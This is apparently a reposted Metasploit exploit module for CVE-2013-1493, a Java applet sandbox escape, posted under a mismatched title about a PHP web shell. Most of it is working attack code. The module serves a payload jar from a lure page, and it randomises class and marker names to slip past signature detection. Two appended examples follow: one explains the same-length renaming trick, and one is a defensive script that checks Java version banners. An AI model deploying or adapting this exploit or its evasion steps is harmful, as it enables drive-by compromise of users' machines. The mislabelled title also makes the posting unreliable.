STUNSHELL PHP Web Shell Remote Code Execution

Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # No JavaScript is needed on the client side; the applet tag alone triggers the load.
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',      # Vulnerability discovery and Exploit
          'juan vazquez'  # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled exploit classes shipped with the framework. The Init class
  # (the applet entry point) is renamed to a random string of the SAME length, because
  # the rename is done with a raw gsub over the class bytes, whose string constants
  # are length-prefixed.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Build the applet jar: the payload jar plus the four exploit classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Replace the "metasploit" / "Payload" markers in entry names and bytes with
      # random strings of identical length to avoid trivial signature matches.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str = rand_text_alpha("payload".length)

      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }

      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      # Landing page: regenerate the payload for this client and serve the applet tag.
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      # Anything else is bounced to the resource root so the applet page is hit.
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # A 1x1 applet pointing at a randomly named jar and the renamed Init class.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|

    return html
  end

end
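Added example, not part of the posted module or of the Metasploit Framework. It shows why the module sizes its random class name with rand_text_alpha("Init".length) before doing a raw gsub over the .class bytes, and why metasploit_str / payload_str are likewise same-length: CONSTANT_Utf8 entries in a class-file constant pool are length-prefixed (tag 0x01, u2 big-endian length, then the bytes), so a substitution that changes the length desynchronises every entry after it. The constant pool below is a constructed stand-in for a real class file, and all helper names are this example's own.

```ruby
# Constructed demonstration of same-length renaming over a length-prefixed
# constant pool. Not the module's code; POOL is a made-up constant pool.

ALPHA = (('a'..'z').to_a + ('A'..'Z').to_a).freeze

# Same contract as the framework's rand_text_alpha(len): exactly len random letters.
def rand_text_alpha(len, rng = Random.new)
  Array.new(len) { ALPHA[rng.rand(ALPHA.size)] }.join
end

# Serialise strings as consecutive CONSTANT_Utf8 entries (tag 1, u2 length, bytes).
def build_utf8_pool(strings)
  strings.map { |s| [1, s.bytesize].pack("Cn") + s.b }.join.b
end

# Parse count CONSTANT_Utf8 entries back out; raises if the layout is broken.
def parse_utf8_pool(blob, count)
  pos = 0
  out = []
  count.times do
    raise "truncated header at #{pos}" if pos + 3 > blob.bytesize
    tag, len = blob.byteslice(pos, 3).unpack("Cn")
    raise "bad tag #{tag} at #{pos}" unless tag == 1
    pos += 3
    raise "truncated entry at #{pos}" if pos + len > blob.bytesize
    out << blob.byteslice(pos, len)
    pos += len
  end
  raise "#{blob.bytesize - pos} trailing bytes" unless pos == blob.bytesize
  out
end

# Blind byte-level replace, i.e. what @init_class.gsub!("Init", @init_class_name) does.
def rename_in_blob(blob, from, to)
  blob.gsub(from, to)
end

# Returns [ok, entries]; ok is true only if the patched pool still parses and no
# entry still contains the old token. A length-changing rename fails here.
def rename_check(strings, from, to)
  patched = rename_in_blob(build_utf8_pool(strings), from, to)
  entries = parse_utf8_pool(patched, strings.size)
  [entries.none? { |e| e.include?(from) }, entries]
rescue RuntimeError
  [false, nil]
end

# Mirrors the metasploit_str / payload_str step: each marker is mapped to a fresh
# random name of identical length. Returns [patched_blob, mapping].
def randomize_markers(blob, markers, rng = Random.new)
  mapping = {}
  patched = markers.inject(blob) do |acc, marker|
    mapping[marker] = rand_text_alpha(marker.length, rng)
    rename_in_blob(acc, marker, mapping[marker])
  end
  [patched, mapping]
end

# Constructed constant-pool contents resembling what the module ships in its jar.
POOL = ["Init", "Ljava/lang/Object;", "Init.java", "<init>",
        "metasploit/Payload", "Payload.class"].freeze

if __FILE__ == $0
  ok, = rename_check(POOL, "Init", rand_text_alpha(4))
  bad, = rename_check(POOL, "Init", "Initialize")
  puts "same-length rename parses: #{ok}, length-changing rename parses: #{bad}"
end
```

The same constraint applies to any string the module touches inside class bytes: "Init", "metasploit" and "Payload" are all replaced by tokens of equal length, which is why the module never picks a shorter or longer name.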
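Added example, not part of the posted module. It turns the affected range quoted in the module description (Java 7 Update 15 and earlier, Java 6 Update 41 and earlier) into a check over `java -version` banners, which is the triage a defender runs before worrying about this applet. The banners are constructed samples keyed by made-up host names; on a real host you would pass in the output of `java -version 2>&1`. Treating Java 8 and later as not affected, and Java 5 as unknown, are this example's assumptions, not statements from the module.

```ruby
# Constructed version-check example. Not the module's code; SAMPLE_BANNERS are made up.

# Matches both "java version" and "openjdk version" banners, for the legacy
# 1.x.y_uu scheme and the newer 9+ scheme.
JAVA_VERSION_RE = /version "(?:1\.(\d+)\.\d+(?:_(\d+))?|(\d+)(?:\.\d+)*)/

# Highest update level still affected, taken from the module description.
AFFECTED_MAX_UPDATE = { 6 => 41, 7 => 15 }.freeze

# Returns [major, update] (update 0 when absent) or nil if no version is recognised.
def parse_java_version(banner)
  m = JAVA_VERSION_RE.match(banner) or return nil
  return [m[1].to_i, (m[2] || "0").to_i] if m[1]
  [m[3].to_i, 0]
end

# true / false when the banner can be classified, nil when it cannot (unparseable
# banner, or a major version the description says nothing about, such as Java 5).
def cve_2013_1493_affected?(banner)
  parsed = parse_java_version(banner) or return nil
  major, update = parsed
  return update <= AFFECTED_MAX_UPDATE[major] if AFFECTED_MAX_UPDATE.key?(major)
  return false if major > 7   # assumption: later majors (8+) ship with the fix
  nil
end

# Constructed banners, as `java -version 2>&1` would print them.
SAMPLE_BANNERS = {
  "ws-01" => "java version \"1.7.0_15\"\nJava(TM) SE Runtime Environment (build 1.7.0_15-b03)",
  "ws-02" => "java version \"1.7.0_17\"\nJava(TM) SE Runtime Environment (build 1.7.0_17-b02)",
  "ws-03" => "java version \"1.6.0_41\"\nJava(TM) SE Runtime Environment (build 1.6.0_41-b02)",
  "ws-04" => "java version \"1.6.0_43\"",
  "ws-05" => "openjdk version \"11.0.2\" 2019-01-15",
  "ws-06" => "bash: java: command not found",
}.freeze

# Classify every host: host name => true / false / nil.
def triage(banners = SAMPLE_BANNERS)
  banners.transform_values { |b| cve_2013_1493_affected?(b) }
end

if __FILE__ == $0
  triage.each { |host, status| puts "#{host}: #{status.nil? ? 'unknown' : status}" }
end
```

Note that the update number, not just the major version, decides the outcome: 1.7.0_15 is in range while 1.7.0_17 is not, so a check that only looks at "Java 7" will both over- and under-report.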